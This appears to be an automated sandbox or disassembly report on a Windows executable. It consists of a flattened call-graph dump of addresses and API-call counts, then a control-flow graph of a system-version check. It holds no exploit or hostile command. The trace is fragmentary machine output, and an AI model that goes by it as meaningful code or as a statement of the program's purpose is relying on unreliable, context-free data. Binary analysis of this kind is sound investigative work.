26ed7c ___std_exception_copy 21 API calls 97698->97699 97700 2b2b5b 97699->97700 97700->97679 97702 26e9f4 ___scrt_is_nonwritable_in_current_image 97701->97702 97703 26ea05 97702->97703 97704 26ea1a 97702->97704 97732 26f649 20 API calls _abort 97703->97732 97712 26ea15 __fread_nolock 97704->97712 97715 2694fd EnterCriticalSection 97704->97715 97706 26ea0a 97733 272b5c 26 API calls __cftof 97706->97733 97709 26ea36 97716 26e972 97709->97716 97711 26ea41 97734 26ea5e LeaveCriticalSection __fread_nolock 97711->97734 97712->97692 97715->97709 97717 26e994 97716->97717 97718 26e97f 97716->97718 97725 26e98f 97717->97725 97735 26df7b 97717->97735 97760 26f649 20 API calls _abort 97718->97760 97720 26e984 97761 272b5c 26 API calls __cftof 97720->97761 97725->97711 97732->97706 97733->97712 97734->97712 97736 26df93 97735->97736 97737 26df8f 97735->97737 97736->97737 97738 26dcc5 __fread_nolock 26 API calls 97736->97738 97741 2750ed 97737->97741 97760->97720 97761->97725 97786->96986 97788 2439eb 97787->97788 97789 245f4e 97787->97789 97788->96992 97821 2ad11f 42 API calls 97788->97821 97789->97788 97790 285070 DestroyIcon 97789->97790 97790->97788 97792 2461c6 97791->97792 97810 2462a8 97791->97810 97822 247ad5 97792->97822 97795 285278 LoadStringW 97799 285292 97795->97799 97796 2461e1 97797 248577 22 API calls 97796->97797 97798 2461f6 97797->97798 97800 246203 97798->97800 97807 2852ae 97798->97807 97802 24bed9 22 API calls 97799->97802 97806 246229 ___scrt_fastfail 97799->97806 97800->97799 97801 24620d 97800->97801 97803 246b7c 22 API calls 97801->97803 97802->97806 97804 24621b 97803->97804 97827 247bb5 22 API calls 97804->97827 97808 24628e Shell_NotifyIconW 97806->97808 97807->97806 97809 24bf73 22 API calls 97807->97809 97819 2852f1 97807->97819 97808->97810 97811 2852d8 97809->97811 97810->96997 97828 2aa350 23 API calls 97811->97828 97814 2852e3 97829 247bb5 22 API calls 97814->97829 97815 285310 97817 246b7c 22 API calls 97815->97817 97818 285321 97817->97818 97820 246b7c 22 API calls 97818->97820 97830 25fe6f 51 API calls 97819->97830 97820->97806 97821->96992 97823 26017b 22 API calls 97822->97823 97824 247afa 97823->97824 97825 26014b 22 API calls 97824->97825 97826 2461d4 97825->97826 97826->97795 97826->97796 97827->97806 97828->97814 97829->97819 97830->97815 97832 246bb4 _wcslen 97831->97832 97833 246bc7 97832->97833 97834 285860 97832->97834 97841 247d74 97833->97841 97836 26014b 22 API calls 97834->97836 97838 28586a 97836->97838 97837 246bd4 __fread_nolock 97837->97016 97839 26017b 22 API calls 97838->97839 97840 28589a __fread_nolock 97839->97840 97842 247d8a 97841->97842 97844 247d85 __fread_nolock 97841->97844 97843 26017b 22 API calls 97842->97843 97845 286528 97842->97845 97843->97844 97844->97837 97845->97845 97847 264f4b FindHandler 97846->97847 97848 264f64 97847->97848 97849 264f52 97847->97849 97870 2732d1 EnterCriticalSection 97848->97870 97885 265099 GetModuleHandleW 97849->97885 97852 264f57 97852->97848 97886 2650dd GetModuleHandleExW 97852->97886 97853 265009 97874 265049 97853->97874 97857 264fe0 97862 264ff8 97857->97862 97867 272791 _abort 5 API calls 97857->97867 97859 264f6b 97859->97853 97859->97857 97871 272518 97859->97871 97860 265026 97877 265058 97860->97877 97861 265052 97894 2820a9 5 API calls CatchGuardHandler 97861->97894 97863 272791 _abort 5 API calls 97862->97863 97863->97853 97867->97862 97870->97859 97895 272251 97871->97895 97914 273319 LeaveCriticalSection 97874->97914 97876 265022 97876->97860 97876->97861 97915 27397f 97877->97915 97880 265086 97883 2650dd _abort 8 API calls 97880->97883 97881 265066 GetPEB 97881->97880 97882 265076 GetCurrentProcess TerminateProcess 97881->97882 97882->97880 97884 26508e ExitProcess 97883->97884 97885->97852 97887 265107 GetProcAddress 97886->97887 97888 26512a 97886->97888 97889 26511c 97887->97889 97890 265130 FreeLibrary 97888->97890 97891 265139 97888->97891 97889->97888 97890->97891 97892 260dfc CatchGuardHandler 5 API calls 97891->97892 97893 264f63 97892->97893 97893->97848 97898 272200 97895->97898 97897 272275 97897->97857 97899 27220c ___scrt_is_nonwritable_in_current_image 97898->97899 97906 2732d1 EnterCriticalSection 97899->97906 97901 27221a 97907 2722a1 97901->97907 97905 272238 __fread_nolock 97905->97897 97906->97901 97910 2722c9 97907->97910 97911 2722c1 97907->97911 97908 260dfc CatchGuardHandler 5 API calls 97909 272227 97908->97909 97913 272245 LeaveCriticalSection _abort 97909->97913 97910->97911 97912 272d38 _free 20 API calls 97910->97912 97911->97908 97912->97911 97913->97905 97914->97876 97916 2739a4 97915->97916 97917 27399a 97915->97917 97922 27334a 5 API calls 2 library calls 97916->97922 97919 260dfc CatchGuardHandler 5 API calls 97917->97919 97920 265062 97919->97920 97920->97880 97920->97881 97921 2739bb 97921->97917 97922->97921 97923 2436f5 97926 24370f 97923->97926 97927 243726 97926->97927 97928 24378a 97927->97928 97929 24372b 97927->97929 97930 243788 97927->97930 97934 243790 97928->97934 97935 283df4 97928->97935 97931 243804 PostQuitMessage 97929->97931 97932 243738 97929->97932 97933 24376f DefWindowProcW 97930->97933 97939 243709 97931->97939 97936 243743 97932->97936 97937 283e61 97932->97937 97933->97939 97940 243797 97934->97940 97941 2437bc SetTimer RegisterWindowMessageW 97934->97941 97975 242f92 10 API calls 97935->97975 97944 24374d 97936->97944 97945 24380e 97936->97945 97978 2ac8f7 66 API calls ___scrt_fastfail 97937->97978 97942 2437a0 KillTimer 97940->97942 97943 283d95 97940->97943 97941->97939 97946 2437e5 CreatePopupMenu 97941->97946 97949 243907 Shell_NotifyIconW 97942->97949 97955 283d9a 97943->97955 97956 283dd0 MoveWindow 97943->97956 97950 243758 97944->97950 97951 283e46 97944->97951 97973 25fcad 59 API calls ___scrt_fastfail 97945->97973 97946->97939 97948 283e15 97976 25f23c 41 API calls 97948->97976 97959 2437b3 97949->97959 97960 2437f2 97950->97960 97961 243763 97950->97961 97951->97933 97977 2a1423 22 API calls 97951->97977 97952 283e73 97952->97933 97952->97939 97957 283dbf SetFocus 97955->97957 97958 283da0 97955->97958 97956->97939 97957->97939 97958->97961 97963 283da9 97958->97963 97971 2459ff DeleteObject DestroyWindow 97959->97971 97972 24381f 76 API calls ___scrt_fastfail 97960->97972 97961->97933 97968 243907 Shell_NotifyIconW 97961->97968 97962 243802 97962->97939 97974 242f92 10 API calls 97963->97974 97969 283e3a 97968->97969 97970 24396b 61 API calls 97969->97970 97970->97930 97971->97939 97972->97962 97973->97962 97974->97939 97975->97948 97976->97961 97977->97930 97978->97952 97979 241033 97984 2468b4 97979->97984 97983 241042 97985 24bf73 22 API calls 97984->97985 97986 246922 97985->97986 97992 24589f 97986->97992 97988 2469bf 97990 241038 97988->97990 97995 246b14 22 API calls __fread_nolock 97988->97995 97991 260413 29 API calls __onexit 97990->97991 97991->97983 97996 2458cb 97992->97996 97995->97988 97997 2458be 97996->97997 97998 2458d8 97996->97998 97997->97988 97998->97997 97999 2458df RegOpenKeyExW 97998->97999 97999->97997 98000 2458f9 RegQueryValueExW 97999->98000 98001 24592f RegCloseKey 98000->98001 98002 24591a 98000->98002 98001->97997 98002->98001 98003 24f4dc 98006 24cab0 98003->98006 98007 24cacb 98006->98007 98008 29150c 98007->98008 98009 2914be 98007->98009 98017 24caf0 98007->98017 98051 2c62ff 191 API calls 2 library calls 98008->98051 98012 2914c8 98009->98012 98015 2914d5 98009->98015 98009->98017 98049 2c6790 191 API calls 98012->98049 98032 24cdc0 98015->98032 98050 2c6c2d 191 API calls 2 library calls 98015->98050 98019 25e807 40 API calls 98017->98019 98024 2916e8 98017->98024 98027 24be2d 40 API calls 98017->98027 98028 24cdee 98017->98028 98017->98032 98033 24cf80 40 API calls 98017->98033 98034 250340 191 API calls 98017->98034 98035 24bed9 22 API calls 98017->98035 98037 25e7c1 40 API calls 98017->98037 98038 25aa99 191 API calls 98017->98038 98039 2605b2 5 API calls __Init_thread_wait 98017->98039 98040 25bc58 98017->98040 98045 260413 29 API calls __onexit 98017->98045 98046 260568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 98017->98046 98047 25f4df 82 API calls 98017->98047 98048 25f346 191 API calls 98017->98048 98052 24b4c8 22 API calls 98017->98052 98053 29ffaf 22 API calls 98017->98053 98019->98017 98020 29179f 98020->98020 98054 2c6669 82 API calls 98024->98054 98027->98017 98032->98028 98055 2b3fe1 82 API calls __wsopen_s 98032->98055 98033->98017 98034->98017 98035->98017 98037->98017 98038->98017 98039->98017 98041 26014b 22 API calls 98040->98041 98042 25bc65 98041->98042 98043 24b329 22 API calls 98042->98043 98044 25bc70 98043->98044 98044->98017 98045->98017 98046->98017 98047->98017 98048->98017 98049->98015 98050->98032 98051->98017 98052->98017 98053->98017 98054->98032 98055->98020 98056 295650 98065 25e3d5 98056->98065 98058 295666 98060 2956e1 98058->98060 98074 25aa65 23 API calls 98058->98074 98063 2961d7 98060->98063 98076 2b3fe1 82 API calls __wsopen_s 98060->98076 98061 2956c1 98061->98060 98075 2b247e 22 API calls 98061->98075 98066 25e3f6 98065->98066 98067 25e3e3 98065->98067 98069 25e429 98066->98069 98070 25e3fb 98066->98070 98077 24b4c8 22 API calls 98067->98077 98078 24b4c8 22 API calls 98069->98078 98071 26014b 22 API calls 98070->98071 98073 25e3ed 98071->98073 98073->98058 98074->98061 98075->98060 98076->98063 98077->98073 98078->98073 98079 24dd3d 98080 2919c2 98079->98080 98082 24dd63 98079->98082 98081 291a46 98080->98081 98084 291a82 98080->98084 98089 291a26 98080->98089 98087 291a7d 98081->98087 98130 2b3fe1 82 API calls __wsopen_s 98081->98130 98085 26014b 22 API calls 98082->98085 98086 24dead 98082->98086 98131 2b3fe1 82 API calls __wsopen_s 98084->98131 98092 24dd8d 98085->98092 98090 26017b 22 API calls 98086->98090 98129 25e6e8 191 API calls 98089->98129 98098 24dee4 __fread_nolock 98090->98098 98093 26014b 22 API calls 98092->98093 98092->98098 98095 24dddb 98093->98095 98094 26017b 22 API calls 98094->98098 98095->98089 98096 24de16 98095->98096 98097 250340 191 API calls 98096->98097 98099 24de29 98097->98099 98098->98081 98098->98094 98099->98087 98099->98098 98100 291aa5 98099->98100 98101 24de77 98099->98101 98103 24d526 98099->98103 98132 2b3fe1 82 API calls __wsopen_s 98100->98132 98101->98086 98101->98103 98104 26014b 22 API calls 98103->98104 98105 24d589 98104->98105 98121 24c32d 98105->98121 98108 26014b 22 API calls 98113 24d66e ISource 98108->98113 98109 24c3ab 22 API calls 98119 24d9ac ISource 98109->98119 98110 24bed9 22 API calls 98110->98113 98113->98110 98114 291f79 98113->98114 98115 291f94 98113->98115 98117 24c3ab 22 API calls 98113->98117 98118 24d911 ISource 98113->98118 98133 24b4c8 22 API calls 98113->98133 98134 2a56ae 22 API calls ISource 98114->98134 98117->98113 98118->98109 98118->98119 98120 24d9c3 98119->98120 98128 25e30a 22 API calls ISource 98119->98128 98125 24c33d 98121->98125 98122 24c345 98122->98108 98123 26014b 22 API calls 98123->98125 98124 24bf73 22 API calls 98124->98125 98125->98122 98125->98123 98125->98124 98126 24bed9 22 API calls 98125->98126 98127 24c32d 22 API calls 98125->98127 98126->98125 98127->98125 98128->98119 98129->98081 98130->98087 98131->98087 98132->98087 98133->98113 98134->98115 98135 250ebf 98136 250ed3 98135->98136 98141 251425 98135->98141 98137 250ee5 98136->98137 98138 26014b 22 API calls 98136->98138 98139 29562c 98137->98139 98142 250f3e 98137->98142 98225 24b4c8 22 API calls 98137->98225 98138->98137 98226 2b1b14 22 API calls 98139->98226 98141->98137 98145 24bed9 22 API calls 98141->98145 98160 25049d ISource 98142->98160 98168 252b20 98142->98168 98145->98137 98146 29632b 98230 2b3fe1 82 API calls __wsopen_s 98146->98230 98148 251695 98152 24bed9 22 API calls 98148->98152 98148->98160 98150 295cdb 98155 24bed9 22 API calls 98150->98155 98150->98160 98151 29625a 98229 2b3fe1 82 API calls __wsopen_s 98151->98229 98152->98160 98155->98160 98156 24bed9 22 API calls 98167 250376 ISource 98156->98167 98157 2605b2 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 98157->98167 98159 24bf73 22 API calls 98159->98167 98161 260413 29 API calls pre_c_initialization 98161->98167 98162 250aae ISource 98228 2b3fe1 82 API calls __wsopen_s 98162->98228 98163 296115 98227 2b3fe1 82 API calls __wsopen_s 98163->98227 98164 260568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 98164->98167 98166 26014b 22 API calls 98166->98167 98167->98146 98167->98148 98167->98150 98167->98151 98167->98156 98167->98157 98167->98159 98167->98160 98167->98161 98167->98162 98167->98163 98167->98164 98167->98166 98223 251990 191 API calls 2 library calls 98167->98223 98224 251e50 41 API calls ISource 98167->98224 98169 252b86 98168->98169 98170 252fc0 98168->98170 98172 297bd8 98169->98172 98173 252ba0 98169->98173 98304 2605b2 5 API calls __Init_thread_wait 98170->98304 98267 2c7af9 98172->98267 98176 253160 9 API calls 98173->98176 98175 252fca 98179 24b329 22 API calls 98175->98179 98184 25300b 98175->98184 98178 252bb0 98176->98178 98177 297be4 98177->98167 98180 253160 9 API calls 98178->98180 98189 252fe4 98179->98189 98181 252bc6 98180->98181 98183 252bfc 98181->98183 98181->98184 98182 297bed 98182->98167 98185 297bfd 98183->98185 98208 252c18 __fread_nolock 98183->98208 98184->98182 98306 24b4c8 22 API calls 98184->98306 98309 2b3fe1 82 API calls __wsopen_s 98185->98309 98188 253049 98307 25e6e8 191 API calls 98188->98307 98305 260568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 98189->98305 98191 297c15 98310 2b3fe1 82 API calls __wsopen_s 98191->98310 98194 252d3f 98195 297c78 98194->98195 98196 252d4c 98194->98196 98312 2c61a2 54 API calls _wcslen 98195->98312 98197 253160 9 API calls 98196->98197 98199 252d59 98197->98199 98203 297da1 98199->98203 98205 253160 9 API calls 98199->98205 98200 26014b 22 API calls 98200->98208 98201 253082 98308 25fe39 22 API calls 98201->98308 98202 26017b 22 API calls 98202->98208 98214 297c10 98203->98214 98313 2b3fe1 82 API calls __wsopen_s 98203->98313 98210 252d73 98205->98210 98207 250340 191 API calls 98207->98208 98208->98188 98208->98191 98208->98194 98208->98200 98208->98202 98208->98207 98209 297c59 98208->98209 98208->98214 98311 2b3fe1 82 API calls __wsopen_s 98209->98311 98210->98203 98212 24bed9 22 API calls 98210->98212 98215 252dd7 ISource 98210->98215 98212->98215 98213 253160 9 API calls 98213->98215 98214->98167 98215->98201 98215->98203 98215->98213 98215->98214 98218 252e8b ISource 98215->98218 98231 2c9fe8 98215->98231 98234 2bf94a 98215->98234 98243 25ac3e 98215->98243 98262 2cad47 98215->98262 98216 252f2d 98216->98167 98218->98216 98303 25e322 22 API calls ISource 98218->98303 98223->98167 98224->98167 98225->98137 98226->98160 98227->98162 98228->98160 98229->98160 98230->98160 98314 2c89b6 98231->98314 98233 2c9ff8 98233->98215 98235 26017b 22 API calls 98234->98235 98236 2bf95b 98235->98236 98237 24423c 22 API calls 98236->98237 98238 2bf965 98237->98238 98239 248ec0 53 API calls 98238->98239 98240 2bf97c GetEnvironmentVariableW 98239->98240 98433 2b160f 22 API calls 98240->98433 98242 2bf999 ISource 98242->98215 98244 248ec0 53 API calls 98243->98244 98245 25ac68 98244->98245 98246 25bc58 22 API calls 98245->98246 98247 25ac7f 98246->98247 98258 25b09b _wcslen 98247->98258 98434 24c98d 39 API calls 98247->98434 98249 264d98 40 API calls 98249->98258 98250 247ad5 22 API calls 98250->98258 98251 246c03 22 API calls 98251->98258 98253 25bbbe 43 API calls 98253->98258 98255 25b1fb 98255->98215 98256 24c98d 39 API calls 98256->98258 98257 248ec0 53 API calls 98257->98258 98258->98249 98258->98250 98258->98251 98258->98253 98258->98255 98258->98256 98258->98257 98259 248577 22 API calls 98258->98259 98260 24396b 61 API calls 98258->98260 98261 243907 Shell_NotifyIconW 98258->98261 98435 24ad40 22 API calls __fread_nolock 98258->98435 98436 247b1a 22 API calls 98258->98436 98259->98258 98260->98258 98261->98258 98263 248ec0 53 API calls 98262->98263 98264 2cad63 98263->98264 98437 2add87 CreateToolhelp32Snapshot Process32FirstW 98264->98437 98266 2cad72 98266->98215 98268 2c7b38 98267->98268 98269 2c7b52 98267->98269 98465 2b3fe1 82 API calls __wsopen_s 98268->98465 98458 2c60e6 98269->98458 98273 250340 190 API calls 98274 2c7bc1 98273->98274 98275 2c7b4a 98274->98275 98276 2c7c5c 98274->98276 98280 2c7c03 98274->98280 98275->98177 98277 2c7cb0 98276->98277 98278 2c7c62 98276->98278 98277->98275 98279 248ec0 53 API calls 98277->98279 98466 2b1ad8 22 API calls 98278->98466 98281 2c7cc2 98279->98281 98284 2b148b 22 API calls 98280->98284 98285 24c2c9 22 API calls 98281->98285 98283 2c7c85 98467 24bd07 22 API calls 98283->98467 98287 2c7c3b 98284->98287 98288 2c7ce6 CharUpperBuffW 98285->98288 98289 252b20 190 API calls 98287->98289 98290 2c7d00 98288->98290 98289->98275 98291 2c7d07 98290->98291 98292 2c7d53 98290->98292 98295 2b148b 22 API calls 98291->98295 98293 248ec0 53 API calls 98292->98293 98294 2c7d5b 98293->98294 98468 25aa65 23 API calls 98294->98468 98297 2c7d35 98295->98297 98298 252b20 190 API calls 98297->98298 98298->98275 98299 2c7d65 98299->98275 98300 248ec0 53 API calls 98299->98300 98301 2c7d80 98300->98301 98469 24bd07 22 API calls 98301->98469 98303->98218 98304->98175 98305->98184 98306->98188 98307->98201 98308->98201 98309->98214 98310->98214 98311->98214 98312->98210 98313->98214 98352 248ec0 98314->98352 98318 2c8cde 98319 2c8eac 98318->98319 98323 2c8cec 98318->98323 98415 2c9941 60 API calls 98319->98415 98322 2c8ebb 98322->98323 98324 2c8ec7 98322->98324 98388 2c88e3 98323->98388 98340 2c8a32 ISource 98324->98340 98325 248ec0 53 API calls 98342 2c8aa6 98325->98342 98330 2c8d25 98403 25ffe0 98330->98403 98333 2c8d5f 98335 247e12 22 API calls 98333->98335 98334 2c8d45 98410 2b3fe1 82 API calls __wsopen_s 98334->98410 98337 2c8d6e 98335->98337 98339 248470 22 API calls 98337->98339 98338 2c8d50 GetCurrentProcess TerminateProcess 98338->98333 98341 2c8d87 98339->98341 98340->98233 98350 2c8daf 98341->98350 98411 251ca0 22 API calls 98341->98411 98342->98318 98342->98325 98342->98340 98408 2a4ad3 22 API calls __fread_nolock 98342->98408 98409 2c8f7a 42 API calls 98342->98409 98344 2c8f22 98344->98340 98346 2c8f36 FreeLibrary 98344->98346 98345 2c8d9e 98412 2c95d8 75 API calls 98345->98412 98346->98340 98350->98344 98413 251ca0 22 API calls 98350->98413 98414 24b4c8 22 API calls 98350->98414 98416 2c95d8 75 API calls 98350->98416 98353 248ed5 98352->98353 98354 248ed2 98352->98354 98355 248edd 98353->98355 98356 248f0b 98353->98356 98354->98340 98375 2c9730 98354->98375 98417 265536 26 API calls 98355->98417 98358 286b1f 98356->98358 98361 248f1d 98356->98361 98366 286a38 98356->98366 98420 2654f3 26 API calls 98358->98420 98359 248eed 98365 26014b 22 API calls 98359->98365 98418 25fe6f 51 API calls 98361->98418 98362 286b37 98362->98362 98367 248ef7 98365->98367 98369 26017b 22 API calls 98366->98369 98370 286ab1 98366->98370 98368 24b329 22 API calls 98367->98368 98368->98354 98371 286a81 98369->98371 98419 25fe6f 51 API calls 98370->98419 98372 26014b 22 API calls 98371->98372 98373 286aa8 98372->98373 98374 24b329 22 API calls 98373->98374 98374->98370 98376 24c2c9 22 API calls 98375->98376 98377 2c974b CharLowerBuffW 98376->98377 98421 2a9805 98377->98421 98381 24bf73 22 API calls 98382 2c9787 98381->98382 98428 24acc0 22 API calls __fread_nolock 98382->98428 98384 2c979b 98385 24adf4 22 API calls 98384->98385 98387 2c97a5 _wcslen 98385->98387 98386 2c98bb _wcslen 98386->98342 98387->98386 98429 2c8f7a 42 API calls 98387->98429 98389 2c88fe 98388->98389 98393 2c8949 98388->98393 98390 26017b 22 API calls 98389->98390 98391 2c8920 98390->98391 98392 26014b 22 API calls 98391->98392 98391->98393 98392->98391 98394 2c9af3 98393->98394 98395 2c9d08 ISource 98394->98395 98400 2c9b17 _strcat _wcslen 98394->98400 98395->98330 98396 24c98d 39 API calls 98396->98400 98397 24c63f 39 API calls 98397->98400 98398 24ca5b 39 API calls 98398->98400 98399 248ec0 53 API calls 98399->98400 98400->98395 98400->98396 98400->98397 98400->98398 98400->98399 98401 26ed7c 21 API calls ___std_exception_copy 98400->98401 98432 2af8c5 24 API calls _wcslen 98400->98432 98401->98400 98404 25fff5 98403->98404 98405 26008d CreateToolhelp32Snapshot 98404->98405 98406 26007b CloseHandle 98404->98406 98407 26005b 98404->98407 98405->98407 98406->98407 98407->98333 98407->98334 98408->98342 98409->98342 98410->98338 98411->98345 98412->98350 98413->98350 98414->98350 98415->98322 98416->98350 98417->98359 98418->98359 98419->98358 98420->98362 98422 2a9825 _wcslen 98421->98422 98423 2a9914 98422->98423 98424 2a985a 98422->98424 98427 2a9919 98422->98427 98423->98381 98423->98387 98424->98423 98430 25e36b 41 API calls 98424->98430 98427->98423 98431 25e36b 41 API calls 98427->98431 98428->98384 98429->98386 98430->98424 98431->98427 98432->98400 98433->98242 98434->98258 98435->98258 98436->98258 98447 2ae80e 98437->98447 98439 2ade86 CloseHandle 98439->98266 98440 2addd4 Process32NextW 98440->98439 98446 2addcd 98440->98446 98441 24bf73 22 API calls 98441->98446 98442 24b329 22 API calls 98442->98446 98446->98439 98446->98440 98446->98441 98446->98442 98453 24568e 22 API calls 98446->98453 98454 247bb5 22 API calls 98446->98454 98455 25e36b 41 API calls 98446->98455 98451 2ae819 98447->98451 98448 2ae830 98457 26666b 39 API calls 98448->98457 98451->98448 98452 2ae836 98451->98452 98456 266722 GetStringTypeW 98451->98456 98452->98446 98453->98446 98454->98446 98455->98446 98456->98451 98457->98452 98459 2c6101 98458->98459 98464 2c614f 98458->98464 98460 26017b 22 API calls 98459->98460 98462 2c6123 98460->98462 98461 26014b 22 API calls 98461->98462 98462->98461 98462->98464 98470 2b1400 22 API calls 98462->98470 98464->98273 98465->98275 98466->98283 98467->98275 98468->98299 98469->98275 98470->98462 98471 2515ff 98472 25e3d5 22 API calls 98471->98472 98473 251615 98472->98473 98478 25e439 98473->98478 98475 25163f 98490 2b3fe1 82 API calls __wsopen_s 98475->98490 98477 296207 98479 247ad5 22 API calls 98478->98479 98480 25e470 98479->98480 98481 24b329 22 API calls 98480->98481 98484 25e4a1 98480->98484 98482 29e53e 98481->98482 98491 247bb5 22 API calls 98482->98491 98484->98475 98485 29e549 98492 25e7c1 40 API calls 98485->98492 98487 29e55c 98489 29e560 98487->98489 98493 24b4c8 22 API calls 98487->98493 98489->98489 98490->98477 98491->98485 98492->98487 98493->98489 98494 241098 98499 245fc8 98494->98499 98498 2410a7 98500 24bf73 22 API calls 98499->98500 98501 245fdf GetVersionExW 98500->98501 98502 248577 22 API calls 98501->98502 98503 24602c 98502->98503 98504 24adf4 22 API calls 98503->98504 98518 246062 98503->98518 98505 246056 98504->98505 98506 2455dc 22 API calls 98505->98506 98506->98518 98507 24611c GetCurrentProcess IsWow64Process 98508 246138 98507->98508 98509 285269 GetSystemInfo 98508->98509 98510 246150 LoadLibraryA 98508->98510 98511 246161 GetProcAddress 98510->98511 98512 24619d GetSystemInfo 98510->98512 98511->98512 98515 246171 GetNativeSystemInfo 98511->98515 98513 246177 98512->98513 98516 24109d 98513->98516 98517 24617b FreeLibrary 98513->98517 98514 285224 98515->98513 98519 260413 29 API calls __onexit 98516->98519 98517->98516 98518->98507 98518->98514 98519->98498 98520 27947a 98521 279487 98520->98521 98525 27949f 98520->98525 98570 26f649 20 API calls _abort 98521->98570 98523 27948c 98571 272b5c 26 API calls __cftof 98523->98571 98526 2794fa 98525->98526 98534 279497 98525->98534 98572 280144 21 API calls 2 library calls 98525->98572 98528 26dcc5 __fread_nolock 26 API calls 98526->98528 98529 279512 98528->98529 98540 278fb2 98529->98540 98531 279519 98532 26dcc5 __fread_nolock 26 API calls 98531->98532 98531->98534 98533 279545 98532->98533 98533->98534 98535 26dcc5 __fread_nolock 26 API calls 98533->98535 98536 279553 98535->98536 98536->98534 98537 26dcc5 __fread_nolock 26 API calls 98536->98537 98538 279563 98537->98538 98539 26dcc5 __fread_nolock 26 API calls 98538->98539 98539->98534 98541 278fbe ___scrt_is_nonwritable_in_current_image 98540->98541 98542 278fc6 98541->98542 98543 278fde 98541->98543 98574 26f636 20 API calls _abort 98542->98574 98545 2790a4 98543->98545 98549 279017 98543->98549 98581 26f636 20 API calls _abort 98545->98581 98546 278fcb 98575 26f649 20 API calls _abort 98546->98575 98552 279026 98549->98552 98553 27903b 98549->98553 98550 2790a9 98582 26f649 20 API calls _abort 98550->98582 98576 26f636 20 API calls _abort 98552->98576 98573 2754ba EnterCriticalSection 98553->98573 98555 279033 98583 272b5c 26 API calls __cftof 98555->98583 98557 279041 98559 279072 98557->98559 98560 27905d 98557->98560 98558 27902b 98577 26f649 20 API calls _abort 98558->98577 98565 2790c5 __fread_nolock 38 API calls 98559->98565 98578 26f649 20 API calls _abort 98560->98578 98562 278fd3 __fread_nolock 98562->98531 98567 27906d 98565->98567 98566 279062 98579 26f636 20 API calls _abort 98566->98579 98580 27909c LeaveCriticalSection __wsopen_s 98567->98580 98570->98523 98571->98534 98572->98526 98573->98557 98574->98546 98575->98562 98576->98558 98577->98555 98578->98566 98579->98567 98580->98562 98581->98550 98582->98555 98583->98562 98584 29e737 98585 29e6e4 98584->98585 98588 2ae83e SHGetFolderPathW 98585->98588 98589 248577 22 API calls 98588->98589 98590 29e6ed 98589->98590 98591 24105b 98596 2452a7 98591->98596 98593 24106a 98627 260413 29 API calls __onexit 98593->98627 98595 241074 98597 2452b7 __wsopen_s 98596->98597 98598 24bf73 22 API calls 98597->98598 98599 24536d 98598->98599 98600 245594 24 API calls 98599->98600 98601 245376 98600->98601 98628 245238 98601->98628 98604 246b7c 22 API calls 98605 24538f 98604->98605 98606 246a7c 22 API calls 98605->98606 98607 24539e 98606->98607 98608 24bf73 22 API calls 98607->98608 98609 2453a7 98608->98609 98610 24bd57 22 API calls 98609->98610 98611 2453b0 RegOpenKeyExW 98610->98611 98612 284be6 RegQueryValueExW 98611->98612 98616 2453d2 98611->98616 98613 284c7c RegCloseKey 98612->98613 98614 284c03 98612->98614 98613->98616 98622 284c8e _wcslen 98613->98622 98615 26017b 22 API calls 98614->98615 98617 284c1c 98615->98617 98616->98593 98618 24423c 22 API calls 98617->98618 98619 284c27 RegQueryValueExW 98618->98619 98620 284c44 98619->98620 98623 284c5e ISource 98619->98623 98621 248577 22 API calls 98620->98621 98621->98623 98622->98616 98624 24b329 22 API calls 98622->98624 98625 246a7c 22 API calls 98622->98625 98626 24655e 22 API calls 98622->98626 98623->98613 98624->98622 98625->98622 98626->98622 98627->98595 98629 2822d0 __wsopen_s 98628->98629 98630 245245 GetFullPathNameW 98629->98630 98631 245267 98630->98631 98632 248577 22 API calls 98631->98632 98633 245285 98632->98633 98633->98604

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 224 245fc8-246037 call 24bf73 GetVersionExW call 248577 229 28507d-285090 224->229 230 24603d 224->230 231 285091-285095 229->231 232 24603f-246041 230->232 233 285098-2850a4 231->233 234 285097 231->234 235 246047-2460a6 call 24adf4 call 2455dc 232->235 236 2850bc 232->236 233->231 237 2850a6-2850a8 233->237 234->233 248 2460ac-2460ae 235->248 249 285224-28522b 235->249 240 2850c3-2850cf 236->240 237->232 239 2850ae-2850b5 237->239 239->229 243 2850b7 239->243 244 24611c-246136 GetCurrentProcess IsWow64Process 240->244 243->236 246 246195-24619b 244->246 247 246138 244->247 250 24613e-24614a 246->250 247->250 251 2460b4-2460b7 248->251 252 285125-285138 248->252 253 28524b-28524e 249->253 254 28522d 249->254 255 285269-28526d GetSystemInfo 250->255 256 246150-24615f LoadLibraryA 250->256 251->244 258 2460b9-2460f5 251->258 259 28513a-285143 252->259 260 285161-285163 252->260 261 285239-285241 253->261 262 285250-28525f 253->262 257 285233 254->257 263 246161-24616f GetProcAddress 256->263 264 24619d-2461a7 GetSystemInfo 256->264 257->261 258->244 266 2460f7-2460fa 258->266 267 285150-28515c 259->267 268 285145-28514b 259->268 269 285198-28519b 260->269 270 285165-28517a 260->270 261->253 262->257 271 285261-285267 262->271 263->264 272 246171-246175 GetNativeSystemInfo 263->272 265 246177-246179 264->265 279 246182-246194 265->279 280 24617b-24617c FreeLibrary 265->280 273 246100-24610a 266->273 274 2850d4-2850e4 266->274 267->244 268->244 277 28519d-2851b8 269->277 278 2851d6-2851d9 269->278 275 28517c-285182 270->275 276 285187-285193 270->276 271->261 272->265 273->240 282 246110-246116 273->282 285 2850e6-2850f2 274->285 286 2850f7-285101 274->286 275->244 276->244 283 2851ba-2851c0 277->283 284 2851c5-2851d1 277->284 278->244 281 2851df-285206 278->281 280->279 287 285208-28520e 281->287 288 285213-28521f 281->288 282->244 283->244 284->244 285->244 289 285103-28510f 286->289 290 285114-285120 286->290 287->244 288->244 289->244 290->244
                                                                    APIs
                                                                    • GetVersionExW.KERNEL32(?), ref: 00245FF7
                                                                      • Part of subcall function 00248577: _wcslen.LIBCMT ref: 0024858A
                                                                    • GetCurrentProcess.KERNEL32(?,002DDC2C,00000000,?,?), ref: 00246123
                                                                    • IsWow64Process.KERNEL32(00000000,?,?), ref: 0024612A
                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00246155
                                                                    • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00246167
